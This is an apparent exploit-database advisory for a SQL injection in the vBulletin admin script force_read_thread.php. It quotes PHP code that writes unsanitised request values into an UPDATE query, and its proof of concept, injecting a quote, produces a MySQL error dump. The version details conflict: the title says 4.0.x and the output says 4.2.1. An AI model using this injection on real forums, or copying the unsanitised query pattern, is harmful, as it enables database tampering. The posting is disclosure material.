vBulletin 4.0.x SQL Injection

# Exploit Title: vBulletin force Read Thread 0day # # Author(s): n3tw0rk # # Contact: Mail:infectedelite@gmail.com # # Product: 4.0.x # # Software Version x.x.x # # Product Download: http://www.vbulletin.org/forum/showthread.php?t=241754&page=18 # # Google Dork: use your mind # # Homepage: d4tabase.com # _____________________________________________________________# vBulletin version 4.0.x appears to suffer from a remote SQL injection vulnerability in the administrative functionality The exploit is caused due to a variable named 'update_order' not being sanitized before being used within an insert into statement. if ($_REQUEST['do'] == 'update_order') { $vbulletin->input->clean_array_gpc('r', array( 'force_read_order' => TYPE_ARRAY )); if ($vbulletin->GPC['force_read_order']) { foreach ($vbulletin->GPC['force_read_order'] AS $threadid => $order) { $db->query_write(" UPDATE " . TABLE_PREFIX . "thread AS thread SET force_read_order = '$order' WHERE threadid = '$threadid' "); } } POC You will need Admincp Access then go to site.com/admincp/force_read_thread.php then in the force read order colum put a ' into one of them to show this Database error in vBulletin 4.2.1: Invalid SQL: UPDATE thread AS thread SET force_read_order = '1'' WHERE threadid = '5161'; MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '5161'' at line 2 Error Number : 1064 Request Date : Thursday, July 25th 2013 @ 01:20:52 AM Error Date : Thursday, July 25th 2013 @ 01:20:52 AM Script : http://d4tabase.com/admincp/force_read_thread.php?do=update_order Referrer : http://d4tabase.com/admincp/force_read_thread.php IP Address : Username : n3tw0rk Classname : MySQL Version :